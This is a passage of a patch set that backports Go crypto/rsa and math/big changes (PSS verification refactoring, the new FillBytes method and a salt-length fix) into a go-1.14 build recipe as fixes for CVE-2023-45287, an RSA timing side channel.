114+ // See RFC 8017, Section 9.1.2.
115+
116+ hLen := hash.Size()
117+ if sLen == PSSSaltLengthEqualsHash {
118+ sLen = hLen
119+ }
120+ emLen := (emBits + 7) / 8
121+ if emLen != len(em) {
122+ return errors.New("rsa: internal error: inconsistent length")
123+ }
124+
125 // 1. If the length of M is greater than the input limitation for the
126 // hash function (2^61 - 1 octets for SHA-1), output "inconsistent"
127 // and stop.
128 //
129 // 2. Let mHash = Hash(M), an octet string of length hLen.
130- hLen := hash.Size()
131 if hLen != len(mHash) {
132 return ErrVerification
133 }
134
135 // 3. If emLen < hLen + sLen + 2, output "inconsistent" and stop.
136- emLen := (emBits + 7) / 8
137 if emLen < hLen+sLen+2 {
138 return ErrVerification
139 }
140
141 // 4. If the rightmost octet of EM does not have hexadecimal value
142 // 0xbc, output "inconsistent" and stop.
143- if em[len(em)-1] != 0xBC {
144+ if em[emLen-1] != 0xbc {
145 return ErrVerification
146 }
147
148 // 5. Let maskedDB be the leftmost emLen - hLen - 1 octets of EM, and
149 // let H be the next hLen octets.
150 db := em[:emLen-hLen-1]
151- h := em[emLen-hLen-1 : len(em)-1]
152+ h := em[emLen-hLen-1 : emLen-1]
153
154 // 6. If the leftmost 8 * emLen - emBits bits of the leftmost octet in
155 // maskedDB are not all equal to zero, output "inconsistent" and
156 // stop.
157- if em[0]&(0xFF<<uint(8-(8*emLen-emBits))) != 0 {
158+ var bitMask byte = 0xff >> (8*emLen - emBits)
159+ if em[0] & ^bitMask != 0 {
160 return ErrVerification
161 }
162
163@@ -132,37 +155,30 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
164
165 // 9. Set the leftmost 8 * emLen - emBits bits of the leftmost octet in DB
166 // to zero.
167- db[0] &= (0xFF >> uint(8*emLen-emBits))
168+ db[0] &= bitMask
169
170+ // If we don't know the salt length, look for the 0x01 delimiter.
171 if sLen == PSSSaltLengthAuto {
172- FindSaltLength:
173- for sLen = emLen - (hLen + 2); sLen >= 0; sLen-- {
174- switch db[emLen-hLen-sLen-2] {
175- case 1:
176- break FindSaltLength
177- case 0:
178- continue
179- default:
180- return ErrVerification
181- }
182- }
183- if sLen < 0 {
184+ psLen := bytes.IndexByte(db, 0x01)
185+ if psLen < 0 {
186 return ErrVerification
187 }
188- } else {
189- // 10. If the emLen - hLen - sLen - 2 leftmost octets of DB are not zero
190- // or if the octet at position emLen - hLen - sLen - 1 (the leftmost
191- // position is "position 1") does not have hexadecimal value 0x01,
192- // output "inconsistent" and stop.
193- for _, e := range db[:emLen-hLen-sLen-2] {
194- if e != 0x00 {
195- return ErrVerification
196- }
197- }
198- if db[emLen-hLen-sLen-2] != 0x01 {
199+ sLen = len(db) - psLen - 1
200+ }
201+
202+ // 10. If the emLen - hLen - sLen - 2 leftmost octets of DB are not zero
203+ // or if the octet at position emLen - hLen - sLen - 1 (the leftmost
204+ // position is "position 1") does not have hexadecimal value 0x01,
205+ // output "inconsistent" and stop.
206+ psLen := emLen - hLen - sLen - 2
207+ for _, e := range db[:psLen] {
208+ if e != 0x00 {
209 return ErrVerification
210 }
211 }
212+ if db[psLen] != 0x01 {
213+ return ErrVerification
214+ }
215
216 // 11. Let salt be the last sLen octets of DB.
217 salt := db[len(db)-sLen:]
218@@ -181,19 +197,19 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
219 h0 := hash.Sum(nil)
220
221 // 14. If H = H', output "consistent." Otherwise, output "inconsistent."
222- if !bytes.Equal(h0, h) {
223+ if !bytes.Equal(h0, h) { // TODO: constant time?
224 return ErrVerification
225 }
226 return nil
227 }
228
229-// signPSSWithSalt calculates the signature of hashed using PSS [1] with specified salt.
230+// signPSSWithSalt calculates the signature of hashed using PSS with specified salt.
231 // Note that hashed must be the result of hashing the input message using the
232 // given hash function. salt is a random sequence of bytes whose length will be
233 // later used to verify the signature.
234 func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) (s []byte, err error) {
235- nBits := priv.N.BitLen()
236- em, err := emsaPSSEncode(hashed, nBits-1, salt, hash.New())
237+ emBits := priv.N.BitLen() - 1
238+ em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
239 if err != nil {
240 return
241 }
242@@ -202,7 +218,7 @@ func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed,
243 if err != nil {
244 return
245 }
246- s = make([]byte, (nBits+7)/8)
247+ s = make([]byte, priv.Size())
248 copyWithLeftPad(s, c.Bytes())
249 return
250 }
251@@ -223,16 +239,15 @@ type PSSOptions struct {
252 // PSSSaltLength constants.
253 SaltLength int
254
255- // Hash, if not zero, overrides the hash function passed to SignPSS.
256- // This is the only way to specify the hash function when using the
257- // crypto.Signer interface.
258+ // Hash is the hash function used to generate the message digest. If not
259+ // zero, it overrides the hash function passed to SignPSS. It's required
260+ // when using PrivateKey.Sign.
261 Hash crypto.Hash
262 }
263
264-// HashFunc returns pssOpts.Hash so that PSSOptions implements
265-// crypto.SignerOpts.
266-func (pssOpts *PSSOptions) HashFunc() crypto.Hash {
267- return pssOpts.Hash
268+// HashFunc returns opts.Hash so that PSSOptions implements crypto.SignerOpts.
269+func (opts *PSSOptions) HashFunc() crypto.Hash {
270+ return opts.Hash
271 }
272
273 func (opts *PSSOptions) saltLength() int {
274@@ -242,56 +257,50 @@ func (opts *PSSOptions) saltLength() int {
275 return opts.SaltLength
276 }
277
278-// SignPSS calculates the signature of hashed using RSASSA-PSS [1].
279-// Note that hashed must be the result of hashing the input message using the
280-// given hash function. The opts argument may be nil, in which case sensible
281-// defaults are used.
282-func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []byte, opts *PSSOptions) ([]byte, error) {
283+// SignPSS calculates the signature of digest using PSS.
284+//
285+// digest must be the result of hashing the input message using the given hash
286+// function. The opts argument may be nil, in which case sensible defaults are
287+// used. If opts.Hash is set, it overrides hash.
288+func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte, opts *PSSOptions) ([]byte, error) {
289+ if opts != nil && opts.Hash != 0 {
290+ hash = opts.Hash
291+ }
292+
293 saltLength := opts.saltLength()
294 switch saltLength {
295 case PSSSaltLengthAuto:
296- saltLength = (priv.N.BitLen()+7)/8 - 2 - hash.Size()
297+ saltLength = priv.Size() - 2 - hash.Size()
298 case PSSSaltLengthEqualsHash:
299 saltLength = hash.Size()
300 }
301
302- if opts != nil && opts.Hash != 0 {
303- hash = opts.Hash
304- }
305-
306 salt := make([]byte, saltLength)
307 if _, err := io.ReadFull(rand, salt); err != nil {
308 return nil, err
309 }
310- return signPSSWithSalt(rand, priv, hash, hashed, salt)
311+ return signPSSWithSalt(rand, priv, hash, digest, salt)
312 }
313
314 // VerifyPSS verifies a PSS signature.
315-// hashed is the result of hashing the input message using the given hash
316-// function and sig is the signature. A valid signature is indicated by
317-// returning a nil error. The opts argument may be nil, in which case sensible
318-// defaults are used.
319-func VerifyPSS(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte, opts *PSSOptions) error {
320- return verifyPSS(pub, hash, hashed, sig, opts.saltLength())
321-}
322-
323-// verifyPSS verifies a PSS signature with the given salt length.
324-func verifyPSS(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte, saltLen int) error {
325- nBits := pub.N.BitLen()
326- if len(sig) != (nBits+7)/8 {
327+//
328+// A valid signature is indicated by returning a nil error. digest must be the
329+// result of hashing the input message using the given hash function. The opts
330+// argument may be nil, in which case sensible defaults are used. opts.Hash is
331+// ignored.
332+func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts *PSSOptions) error {
333+ if len(sig) != pub.Size() {
334 return ErrVerification
335 }
336 s := new(big.Int).SetBytes(sig)
337 m := encrypt(new(big.Int), pub, s)
338- emBits := nBits - 1
339+ emBits := pub.N.BitLen() - 1
340 emLen := (emBits + 7) / 8
341- if emLen < len(m.Bytes()) {
342+ emBytes := m.Bytes()
343+ if emLen < len(emBytes) {
344 return ErrVerification
345 }
346 em := make([]byte, emLen)
347- copyWithLeftPad(em, m.Bytes())
348- if saltLen == PSSSaltLengthEqualsHash {
349- saltLen = hash.Size()
350- }
351- return emsaPSSVerify(hashed, em, emBits, saltLen, hash.New())
352+ copyWithLeftPad(em, emBytes)
353+ return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
354 }
355diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
356index 5a42990640164..b4bfa13defbdf 100644
357--- a/src/crypto/rsa/rsa.go
358+++ b/src/crypto/rsa/rsa.go
359@@ -2,7 +2,7 @@
360 // Use of this source code is governed by a BSD-style
361 // license that can be found in the LICENSE file.
362
363-// Package rsa implements RSA encryption as specified in PKCS#1.
364+// Package rsa implements RSA encryption as specified in PKCS#1 and RFC 8017.
365 //
366 // RSA is a single, fundamental operation that is used in this package to
367 // implement either public-key encryption or public-key signatures.
368@@ -10,13 +10,13 @@
369 // The original specification for encryption and signatures with RSA is PKCS#1
370 // and the terms "RSA encryption" and "RSA signatures" by default refer to
371 // PKCS#1 version 1.5. However, that specification has flaws and new designs
372-// should use version two, usually called by just OAEP and PSS, where
373+// should use version 2, usually called by just OAEP and PSS, where
374 // possible.
375 //
376 // Two sets of interfaces are included in this package. When a more abstract
377 // interface isn't necessary, there are functions for encrypting/decrypting
378 // with v1.5/OAEP and signing/verifying with v1.5/PSS. If one needs to abstract
379-// over the public-key primitive, the PrivateKey struct implements the
380+// over the public key primitive, the PrivateKey type implements the
381 // Decrypter and Signer interfaces from the crypto package.
382 //
383 // The RSA operations in this package are not implemented using constant-time algorithms.
384@@ -111,7 +111,8 @@ func (priv *PrivateKey) Public() crypto.PublicKey {
385
386 // Sign signs digest with priv, reading randomness from rand. If opts is a
387 // *PSSOptions then the PSS algorithm will be used, otherwise PKCS#1 v1.5 will
388-// be used.
389+// be used. digest must be the result of hashing the input message using
390+// opts.HashFunc().
391 //
392 // This method implements crypto.Signer, which is an interface to support keys
393 // where the private part is kept in, for example, a hardware module. Common
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch
new file mode 100644
index 0000000000..1327b44545
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch
@@ -0,0 +1,401 @@
1From c9d5f60eaa4450ccf1ce878d55b4c6a12843f2f3 Mon Sep 17 00:00:00 2001
2From: Filippo Valsorda <filippo@golang.org>
3Date: Mon, 27 Apr 2020 21:52:38 -0400
4Subject: [PATCH] math/big: add (*Int).FillBytes
5
6Replaced almost every use of Bytes with FillBytes.
7
8Note that the approved proposal was for
9
10 func (*Int) FillBytes(buf []byte)
11
12while this implements
13
14 func (*Int) FillBytes(buf []byte) []byte
15
16because the latter was far nicer to use in all callsites.
17
18Fixes #35833
19
20Change-Id: Ia912df123e5d79b763845312ea3d9a8051343c0a
21Reviewed-on: https://go-review.googlesource.com/c/go/+/230397
22Reviewed-by: Robert Griesemer <gri@golang.org>
23
24Upstream-Status: Backport [https://github.com/golang/go/commit/c9d5f60eaa4450ccf1ce878d55b4c6a12843f2f3]
25CVE: CVE-2023-45287 #Dependency Patch2
26Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
27---
28 src/crypto/elliptic/elliptic.go | 13 ++++----
29 src/crypto/rsa/pkcs1v15.go | 20 +++---------
30 src/crypto/rsa/pss.go | 17 +++++------
31 src/crypto/rsa/rsa.go | 32 +++----------------
32 src/crypto/tls/key_schedule.go | 7 ++---
33 src/crypto/x509/sec1.go | 7 ++---
34 src/math/big/int.go | 15 +++++++++
35 src/math/big/int_test.go | 54 +++++++++++++++++++++++++++++++++
36 src/math/big/nat.go | 15 ++++++---
37 9 files changed, 106 insertions(+), 74 deletions(-)
38
39diff --git a/src/crypto/elliptic/elliptic.go b/src/crypto/elliptic/elliptic.go
40index e2f71cdb63bab..bd5168c5fd842 100644
41--- a/src/crypto/elliptic/elliptic.go
42+++ b/src/crypto/elliptic/elliptic.go
43@@ -277,7 +277,7 @@ var mask = []byte{0xff, 0x1, 0x3, 0x7, 0xf, 0x1f, 0x3f, 0x7f}
44 func GenerateKey(curve Curve, rand io.Reader) (priv []byte, x, y *big.Int, err error) {
45 N := curve.Params().N
46 bitSize := N.BitLen()
47- byteLen := (bitSize + 7) >> 3
48+ byteLen := (bitSize + 7) / 8
49 priv = make([]byte, byteLen)
50
51 for x == nil {
52@@ -304,15 +304,14 @@ func GenerateKey(curve Curve, rand io.Reader) (priv []byte, x, y *big.Int, err e
53
54 // Marshal converts a point into the uncompressed form specified in section 4.3.6 of ANSI X9.62.
55 func Marshal(curve Curve, x, y *big.Int) []byte {
56- byteLen := (curve.Params().BitSize + 7) >> 3
57+ byteLen := (curve.Params().BitSize + 7) / 8
58
59 ret := make([]byte, 1+2*byteLen)
60 ret[0] = 4 // uncompressed point
61
62- xBytes := x.Bytes()
63- copy(ret[1+byteLen-len(xBytes):], xBytes)
64- yBytes := y.Bytes()
65- copy(ret[1+2*byteLen-len(yBytes):], yBytes)
66+ x.FillBytes(ret[1 : 1+byteLen])
67+ y.FillBytes(ret[1+byteLen : 1+2*byteLen])
68+
69 return ret
70 }
71
72@@ -320,7 +319,7 @@ func Marshal(curve Curve, x, y *big.Int) []byte {
73 // It is an error if the point is not in uncompressed form or is not on the curve.
74 // On error, x = nil.
75 func Unmarshal(curve Curve, data []byte) (x, y *big.Int) {
76- byteLen := (curve.Params().BitSize + 7) >> 3
77+ byteLen := (curve.Params().BitSize + 7) / 8
78 if len(data) != 1+2*byteLen {
79 return
80 }
81diff --git a/src/crypto/rsa/pkcs1v15.go b/src/crypto/rsa/pkcs1v15.go
82index 499242ffc5b57..3208119ae1ff4 100644
83--- a/src/crypto/rsa/pkcs1v15.go
84+++ b/src/crypto/rsa/pkcs1v15.go
85@@ -61,8 +61,7 @@ func EncryptPKCS1v15(rand io.Reader, pub *PublicKey, msg []byte) ([]byte, error)
86 m := new(big.Int).SetBytes(em)
87 c := encrypt(new(big.Int), pub, m)
88
89- copyWithLeftPad(em, c.Bytes())
90- return em, nil
91+ return c.FillBytes(em), nil
92 }
93
94 // DecryptPKCS1v15 decrypts a plaintext using RSA and the padding scheme from PKCS#1 v1.5.
95@@ -150,7 +149,7 @@ func decryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) (valid
96 return
97 }
98
99- em = leftPad(m.Bytes(), k)
100+ em = m.FillBytes(make([]byte, k))
101 firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
102 secondByteIsTwo := subtle.ConstantTimeByteEq(em[1], 2)
103
104@@ -256,8 +255,7 @@ func SignPKCS1v15(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []b
105 return nil, err
106 }
107
108- copyWithLeftPad(em, c.Bytes())
109- return em, nil
110+ return c.FillBytes(em), nil
111 }
112
113 // VerifyPKCS1v15 verifies an RSA PKCS#1 v1.5 signature.
114@@ -286,7 +284,7 @@ func VerifyPKCS1v15(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte)
115
116 c := new(big.Int).SetBytes(sig)
117 m := encrypt(new(big.Int), pub, c)
118- em := leftPad(m.Bytes(), k)
119+ em := m.FillBytes(make([]byte, k))
120 // EM = 0x00 || 0x01 || PS || 0x00 || T
121
122 ok := subtle.ConstantTimeByteEq(em[0], 0)
123@@ -323,13 +321,3 @@ func pkcs1v15HashInfo(hash crypto.Hash, inLen int) (hashLen int, prefix []byte,
124 }
125 return
126 }
127-
128-// copyWithLeftPad copies src to the end of dest, padding with zero bytes as
129-// needed.
130-func copyWithLeftPad(dest, src []byte) {
131- numPaddingBytes := len(dest) - len(src)
132- for i := 0; i < numPaddingBytes; i++ {
133- dest[i] = 0
134- }
135- copy(dest[numPaddingBytes:], src)
136-}
137diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
138index f9844d87329a8..b2adbedb28fa8 100644
139--- a/src/crypto/rsa/pss.go
140+++ b/src/crypto/rsa/pss.go
141@@ -207,20 +207,19 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
142 // Note that hashed must be the result of hashing the input message using the
143 // given hash function. salt is a random sequence of bytes whose length will be
144 // later used to verify the signature.
145-func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) (s []byte, err error) {
146+func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
147 emBits := priv.N.BitLen() - 1
148 em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
149 if err != nil {
150- return
151+ return nil, err
152 }
153 m := new(big.Int).SetBytes(em)
154 c, err := decryptAndCheck(rand, priv, m)
155 if err != nil {
156- return
157+ return nil, err
158 }
159- s = make([]byte, priv.Size())
160- copyWithLeftPad(s, c.Bytes())
161- return
162+ s := make([]byte, priv.Size())
163+ return c.FillBytes(s), nil
164 }
165
166 const (
167@@ -296,11 +295,9 @@ func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts
168 m := encrypt(new(big.Int), pub, s)
169 emBits := pub.N.BitLen() - 1
170 emLen := (emBits + 7) / 8
171- emBytes := m.Bytes()
172- if emLen < len(emBytes) {
173+ if m.BitLen() > emLen*8 {
174 return ErrVerification
175 }
176- em := make([]byte, emLen)
177- copyWithLeftPad(em, emBytes)
178+ em := m.FillBytes(make([]byte, emLen))
179 return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
180 }
181diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
182index b4bfa13defbdf..28eb5926c1a54 100644
183--- a/src/crypto/rsa/rsa.go
184+++ b/src/crypto/rsa/rsa.go
185@@ -416,16 +416,9 @@ func EncryptOAEP(hash hash.Hash, random io.Reader, pub *PublicKey, msg []byte, l
186 m := new(big.Int)
187 m.SetBytes(em)
188 c := encrypt(new(big.Int), pub, m)
189- out := c.Bytes()
190
191- if len(out) < k {
192- // If the output is too small, we need to left-pad with zeros.
193- t := make([]byte, k)
194- copy(t[k-len(out):], out)
195- out = t
196- }
197-
198- return out, nil
199+ out := make([]byte, k)
200+ return c.FillBytes(out), nil
201 }
202
203 // ErrDecryption represents a failure to decrypt a message.
204@@ -597,12 +590,9 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
205 lHash := hash.Sum(nil)
206 hash.Reset()
207
208- // Converting the plaintext number to bytes will strip any
209- // leading zeros so we may have to left pad. We do this unconditionally
210- // to avoid leaking timing information. (Although we still probably
211- // leak the number of leading zeros. It's not clear that we can do
212- // anything about this.)
213- em := leftPad(m.Bytes(), k)
214+ // We probably leak the number of leading zeros.
215+ // It's not clear that we can do anything about this.
216+ em := m.FillBytes(make([]byte, k))
217
218 firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
219
220@@ -643,15 +633,3 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
221
222 return rest[index+1:], nil
223 }
224-
225-// leftPad returns a new slice of length size. The contents of input are right
226-// aligned in the new slice.
227-func leftPad(input []byte, size int) (out []byte) {
228- n := len(input)
229- if n > size {
230- n = size
231- }
232- out = make([]byte, size)
233- copy(out[len(out)-n:], input)
234- return
235-}
236diff --git a/src/crypto/tls/key_schedule.go b/src/crypto/tls/key_schedule.go
237index 2aab323202f7d..314016979afb8 100644
238--- a/src/crypto/tls/key_schedule.go
239+++ b/src/crypto/tls/key_schedule.go
240@@ -173,11 +173,8 @@ func (p *nistParameters) SharedKey(peerPublicKey []byte) []byte {
241 }
242
243 xShared, _ := curve.ScalarMult(x, y, p.privateKey)
244- sharedKey := make([]byte, (curve.Params().BitSize+7)>>3)
245- xBytes := xShared.Bytes()
246- copy(sharedKey[len(sharedKey)-len(xBytes):], xBytes)
247-
248- return sharedKey
249+ sharedKey := make([]byte, (curve.Params().BitSize+7)/8)
250+ return xShared.FillBytes(sharedKey)
251 }
252
253 type x25519Parameters struct {
254diff --git a/src/crypto/x509/sec1.go b/src/crypto/x509/sec1.go
255index 0bfb90cd5464a..52c108ff1d624 100644
256--- a/src/crypto/x509/sec1.go
257+++ b/src/crypto/x509/sec1.go
258@@ -52,13 +52,10 @@ func MarshalECPrivateKey(key *ecdsa.PrivateKey) ([]byte, error) {
259 // marshalECPrivateKey marshals an EC private key into ASN.1, DER format and
260 // sets the curve ID to the given OID, or omits it if OID is nil.
261 func marshalECPrivateKeyWithOID(key *ecdsa.PrivateKey, oid asn1.ObjectIdentifier) ([]byte, error) {
262- privateKeyBytes := key.D.Bytes()
263- paddedPrivateKey := make([]byte, (key.Curve.Params().N.BitLen()+7)/8)
264- copy(paddedPrivateKey[len(paddedPrivateKey)-len(privateKeyBytes):], privateKeyBytes)
265-
266+ privateKey := make([]byte, (key.Curve.Params().N.BitLen()+7)/8)
267 return asn1.Marshal(ecPrivateKey{
268 Version: 1,
269- PrivateKey: paddedPrivateKey,
270+ PrivateKey: key.D.FillBytes(privateKey),
271 NamedCurveOID: oid,
272 PublicKey: asn1.BitString{Bytes: elliptic.Marshal(key.Curve, key.X, key.Y)},
273 })
274diff --git a/src/math/big/int.go b/src/math/big/int.go
275index 8816cf5266cc4..65f32487b58c0 100644
276--- a/src/math/big/int.go
277+++ b/src/math/big/int.go
278@@ -447,11 +447,26 @@ func (z *Int) SetBytes(buf []byte) *Int {
279 }
280
281 // Bytes returns the absolute value of x as a big-endian byte slice.
282+//
283+// To use a fixed length slice, or a preallocated one, use FillBytes.
284 func (x *Int) Bytes() []byte {
285 buf := make([]byte, len(x.abs)*_S)
286 return buf[x.abs.bytes(buf):]
287 }
288
289+// FillBytes sets buf to the absolute value of x, storing it as a zero-extended
290+// big-endian byte slice, and returns buf.
291+//
292+// If the absolute value of x doesn't fit in buf, FillBytes will panic.
293+func (x *Int) FillBytes(buf []byte) []byte {
294+ // Clear whole buffer. (This gets optimized into a memclr.)
295+ for i := range buf {
296+ buf[i] = 0
297+ }
298+ x.abs.bytes(buf)
299+ return buf
300+}
301+
302 // BitLen returns the length of the absolute value of x in bits.
303 // The bit length of 0 is 0.
304 func (x *Int) BitLen() int {
305diff --git a/src/math/big/int_test.go b/src/math/big/int_test.go
306index e3a1587b3f0ad..3c8557323a032 100644
307--- a/src/math/big/int_test.go
308+++ b/src/math/big/int_test.go
309@@ -1840,3 +1840,57 @@ func BenchmarkDiv(b *testing.B) {
310 })
311 }
312 }
313+
314+func TestFillBytes(t *testing.T) {
315+ checkResult := func(t *testing.T, buf []byte, want *Int) {
316+ t.Helper()
317+ got := new(Int).SetBytes(buf)
318+ if got.CmpAbs(want) != 0 {
319+ t.Errorf("got 0x%x, want 0x%x: %x", got, want, buf)
320+ }
321+ }
322+ panics := func(f func()) (panic bool) {
323+ defer func() { panic = recover() != nil }()
324+ f()
325+ return
326+ }
327+
328+ for _, n := range []string{
329+ "0",
330+ "1000",
331+ "0xffffffff",
332+ "-0xffffffff",
333+ "0xffffffffffffffff",
334+ "0x10000000000000000",
335+ "0xabababababababababababababababababababababababababa",
336+ "0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
337+ } {
338+ t.Run(n, func(t *testing.T) {
339+ t.Logf(n)
340+ x, ok := new(Int).SetString(n, 0)
341+ if !ok {
342+ panic("invalid test entry")
343+ }
344+
345+ // Perfectly sized buffer.
346+ byteLen := (x.BitLen() + 7) / 8
347+ buf := make([]byte, byteLen)
348+ checkResult(t, x.FillBytes(buf), x)
349+
350+ // Way larger, checking all bytes get zeroed.
351+ buf = make([]byte, 100)
352+ for i := range buf {
353+ buf[i] = 0xff
354+ }
355+ checkResult(t, x.FillBytes(buf), x)
356+
357+ // Too small.
358+ if byteLen > 0 {
359+ buf = make([]byte, byteLen-1)
360+ if !panics(func() { x.FillBytes(buf) }) {
361+ t.Errorf("expected panic for small buffer and value %x", x)
362+ }
363+ }
364+ })
365+ }
366+}
367diff --git a/src/math/big/nat.go b/src/math/big/nat.go
368index c31ec5156b81d..6a3989bf9d82b 100644
369--- a/src/math/big/nat.go
370+++ b/src/math/big/nat.go
371@@ -1476,19 +1476,26 @@ func (z nat) expNNMontgomery(x, y, m nat) nat {
372 }
373
374 // bytes writes the value of z into buf using big-endian encoding.
375-// len(buf) must be >= len(z)*_S. The value of z is encoded in the
376-// slice buf[i:]. The number i of unused bytes at the beginning of
377-// buf is returned as result.
378+// The value of z is encoded in the slice buf[i:]. If the value of z
379+// cannot be represented in buf, bytes panics. The number i of unused
380+// bytes at the beginning of buf is returned as result.
381 func (z nat) bytes(buf []byte) (i int) {
382 i = len(buf)
383 for _, d := range z {
384 for j := 0; j < _S; j++ {
385 i--
386- buf[i] = byte(d)
387+ if i >= 0 {
388+ buf[i] = byte(d)
389+ } else if byte(d) != 0 {
390+ panic("math/big: buffer too small to fit value")
391+ }
392 d >>= 8
393 }
394 }
395
396+ if i < 0 {
397+ i = 0
398+ }
399 for i < len(buf) && buf[i] == 0 {
400 i++
401 }
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch
new file mode 100644
index 0000000000..ae9fcc170c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch
@@ -0,0 +1,86 @@
1From 8f676144ad7b7c91adb0c6e1ec89aaa6283c6807 Mon Sep 17 00:00:00 2001
2From: Himanshu Kishna Srivastava <28himanshu@gmail.com>
3Date: Tue, 16 Mar 2021 22:37:46 +0530
4Subject: [PATCH] crypto/rsa: fix salt length calculation with
5 PSSSaltLengthAuto
6
7When PSSSaltLength is set, the maximum salt length must equal:
8
9 (modulus_key_size - 1 + 7)/8 - hash_length - 2
10and for example, with a 4096 bit modulus key, and a SHA-1 hash,
11it should be:
12
13 (4096 -1 + 7)/8 - 20 - 2 = 490
14Previously we'd encounter this error:
15
16 crypto/rsa: key size too small for PSS signature
17
18Fixes #42741
19
20Change-Id: I18bb82c41c511d564b3f4c443f4b3a38ab010ac5
21Reviewed-on: https://go-review.googlesource.com/c/go/+/302230
22Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
23Reviewed-by: Filippo Valsorda <filippo@golang.org>
24Trust: Emmanuel Odeke <emmanuel@orijtech.com>
25Run-TryBot: Emmanuel Odeke <emmanuel@orijtech.com>
26TryBot-Result: Go Bot <gobot@golang.org>
27
28Upstream-Status: Backport [https://github.com/golang/go/commit/8f676144ad7b7c91adb0c6e1ec89aaa6283c6807]
29CVE: CVE-2023-45287 #Dependency Patch3
30Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
31---
32 src/crypto/rsa/pss.go | 2 +-
33 src/crypto/rsa/pss_test.go | 20 +++++++++++++++++++-
34 2 files changed, 20 insertions(+), 2 deletions(-)
35
36diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
37index b2adbedb28fa8..814522de8181f 100644
38--- a/src/crypto/rsa/pss.go
39+++ b/src/crypto/rsa/pss.go
40@@ -269,7 +269,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
41 saltLength := opts.saltLength()
42 switch saltLength {
43 case PSSSaltLengthAuto:
44- saltLength = priv.Size() - 2 - hash.Size()
45+ saltLength = (priv.N.BitLen()-1+7)/8 - 2 - hash.Size()
46 case PSSSaltLengthEqualsHash:
47 saltLength = hash.Size()
48 }
49diff --git a/src/crypto/rsa/pss_test.go b/src/crypto/rsa/pss_test.go
50index dfa8d8bb5ad02..c3a6d468497cd 100644
51--- a/src/crypto/rsa/pss_test.go
52+++ b/src/crypto/rsa/pss_test.go
53@@ -12,7 +12,7 @@ import (
54 _ "crypto/md5"
55 "crypto/rand"
56 "crypto/sha1"
57- _ "crypto/sha256"
58+ "crypto/sha256"
59 "encoding/hex"
60 "math/big"
61 "os"
62@@ -233,6 +233,24 @@ func TestPSSSigning(t *testing.T) {
63 }
64 }
65
66+func TestSignWithPSSSaltLengthAuto(t *testing.T) {
67+ key, err := GenerateKey(rand.Reader, 513)
68+ if err != nil {
69+ t.Fatal(err)
70+ }
71+ digest := sha256.Sum256([]byte("message"))
72+ signature, err := key.Sign(rand.Reader, digest[:], &PSSOptions{
73+ SaltLength: PSSSaltLengthAuto,
74+ Hash: crypto.SHA256,
75+ })
76+ if err != nil {
77+ t.Fatal(err)
78+ }
79+ if len(signature) == 0 {
80+ t.Fatal("empty signature returned")
81+ }
82+}
83+
84 func bigFromHex(hex string) *big.Int {
85 n, ok := new(big.Int).SetString(hex, 16)
86 if !ok {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch
new file mode 100644
index 0000000000..90a74255db
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch
@@ -0,0 +1,1697 @@
1From 8a81fdf165facdcefa06531de5af98a4db343035 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?L=C3=BAc=C3=A1s=20Meier?= <cronokirby@gmail.com>
3Date: Tue, 8 Jun 2021 21:36:06 +0200
4Subject: [PATCH] crypto/rsa: replace big.Int for encryption and decryption
5
6Infamously, big.Int does not provide constant-time arithmetic, making
7its use in cryptographic code quite tricky. RSA uses big.Int
8pervasively, in its public API, for key generation, precomputation, and
9for encryption and decryption. This is a known problem. One mitigation,
10blinding, is already in place during decryption. This helps mitigate the
11very leaky exponentiation operation. Because big.Int is fundamentally
12not constant-time, it's unfortunately difficult to guarantee that
13mitigations like these are completely effective.
14
